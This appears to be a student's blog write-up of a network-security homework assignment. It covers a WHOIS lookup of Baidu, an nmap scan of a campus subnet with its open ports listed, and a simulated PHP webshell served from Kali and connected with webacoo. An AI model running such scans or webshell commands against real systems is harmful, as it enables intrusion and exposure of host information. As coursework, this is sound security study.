本文最后更新于7 天前,其中的信息可能已经过时,如有错误请发送邮件到1683566317@qq.com
1. (简答题) 使用WhoIs服务收集百度域名的信息,截图提交,可以使用工具,也可以使用网站,推荐http://whois.bugscaner.com/
这里使用kali虚拟机自带的whois工具来对百度域名信息进行查询
查询到域名标识信息、注册商信息、时间信息分析、域名状态、DNS(域名解析)信息分析等关键信息
2. (简答题)端口扫描,扫描学校服务器开放的端口,并说明端口的具体应用。扫描校园网内任意一个网段。截图提交。
连接校园网,打开终端输入命令ipconfig
根据ip信息,判断学校所处的ip网段是x.x.0.0/15
这里选择使用nmap扫描xx.x.xx9.0/24
明确发现的开放端口有:
xx.x.xx9.6
端口:135、139、445
xx.x.xx9.8
端口:3306
xx.x.xx9.62
端口:3580
xx.x.xx9.6:
| 端口 | 服务名 | 具体应用 |
|---|---|---|
| 135/tcp | MSRPC | Windows 远程过程调用服务,用于系统组件通信 |
| 139/tcp | NetBIOS | Windows 文件与打印共享(旧版 SMB) |
| 445/tcp | SMB | Windows 文件共享服务(现代 SMB) |
xx.x.xx9.8:
| 端口 | 服务名 | 具体应用 |
|---|---|---|
| 3306/tcp | MySQL | MySQL 数据库服务,用于存储和管理系统数据 |
xx.x.xx9.62:
| 端口 | 服务名 | 具体应用 |
|---|---|---|
| 3580/tcp | Web Service | Web 管理界面或应用系统访问端口 |
3. (简答题)在Kali和Windows系统中,模拟实现一句话木马。
在kali系统中生成一句话木马程序文件
这里让kali临时开一个http服务
python3 -m http.server 8000
用Windows浏览器访问下载http://192.168.32.128:8000/hack.php
将木马文件复制到D:\Tools\phpstudy\PHPTutorial\WWW
Windows打开phpstudy服务
kali终端木马连接命令:
webacoo -t -u http://xx.x.xx9.228/hack.php
使用ipconfig可查看到敏感ip地址信息
使用dir命令可查看到敏感目录信息
木马连接成功,目标达成
